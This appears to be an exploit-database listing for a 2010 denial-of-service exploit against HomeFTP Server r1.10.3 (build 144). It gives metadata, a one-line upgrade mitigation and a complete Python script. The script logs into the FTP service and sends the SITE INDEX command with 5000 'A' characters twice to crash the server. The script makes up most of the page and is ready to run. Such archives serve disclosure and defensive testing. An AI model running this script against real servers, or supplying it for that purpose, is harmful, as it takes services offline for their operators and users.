header-logo
Suggest Exploit
vendor:
HomeFTP Server
by:
Dr_IDE
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: HomeFTP Server
Affected Version From: r1.10.3 (build 144)
Affected Version To: r1.10.3 (build 144)
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2010

HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit

This exploit crashes the HomeFTP Server r1.10.3 (build 144) by sending a large number of 'A' characters to the server. The exploit was found by Dr_IDE in May 28, 2010 and tested on Windows 7.

Mitigation:

Upgrade to the latest version of HomeFTP Server.
Source

Exploit-DB raw data:

#!/usr/bin/python
###################################################################
#
# HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit
# Found By: Dr_IDE
# Date:     May 28, 2010
# Download: http://downstairs.dnsalias.net/products.html
# Tested:   Windows 7
#
###################################################################
 
import socket, sys
 
host = (sys.argv[1])
buff = ("A" * 5000)
cmds = ('SITE INDEX')
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[i] Connecting to: " + host +"\r\n")
print ("[*] Crashing server with command: " + cmds + "\r\n")

try:
	s.connect((host, 21))
	d=s.recv(1024)
	print (d)
	s.send("USER dr_ide\r\n") #anonymous login so anything goes
	d=s.recv(1024)
	print (d)
	s.send("PASS dr_ide\r\n")
	d=s.recv(1024)
	print (d)
	s.send(cmds + " " + buff + '\r\n')
	d=s.recv(1024)
	print (d)
	s.send(cmds + " " + buff + '\r\n') #Second time does the trick.
	d=s.recv(1024)
	print (d)
	s.close()
	
	try:
		s.connect((host,21))
	except:
		print ("\r\n[i] Success, Server is Down.")
except:
	print ("[i] Error")